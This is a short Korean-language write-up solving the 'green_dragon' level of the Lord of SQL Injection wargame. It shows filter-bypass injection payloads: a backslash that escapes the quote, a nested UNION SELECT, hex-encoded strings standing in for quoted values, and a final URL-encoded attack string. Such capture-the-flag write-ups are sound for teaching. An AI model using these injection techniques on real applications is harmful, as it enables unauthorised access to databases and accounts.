[Load of SQL Injection] green_dragon
필터링: prob _ . ' "
select id,pw from prob_green_dragon where id='\' and pw=' or id=0x61646d696e%23'
--> id: \ pw: or id=0x61646d696e%23 (admin의 16진수값)
[UNION 사용 예시]
[UNION 적용]
select id,pw from prob_green_dragon where id='\' and pw=' union select 1,2#'
[문제해결]
query2를 select id from prob_green_dragon where id='\' and pw=' union select 'admin'#'
로 만들어 주자.
1. ?id=\&&pw=union select '\', 'union select 'admin''#%23--> ',"(따음표, 홑따음표)가 필터링 된다. 0x값으로 보내주자. --> 뒤의 'admin'을 0x 처리한 0x61646d696e를 'admin 대신 쓴다.
2. https://string-functions.com/string-hex.aspx
String to Hex Online Converter | String Functions
Need to convert hex to text? Use Our Hex to Text Converter Tool! Hexadecimal notation is used as a human-friendly representation of binary values in computer programming and digital electronics. Most programming languages such as Java, ASP.NET, C++, Fortra
string-functions.com
그렇게 해서 입력해야 할 값
select id,pw from prob_green_dragon where id='\' and pw=' union select 0x5c,0x756e696f6e2073656c6563742030783631363436643639366523#'
이런 식으로 되게 입력한다.
URL?id=\&&pw=%20union%20select%200x5c,0x756e696f6e2073656c6563742030783631363436643639366523%23
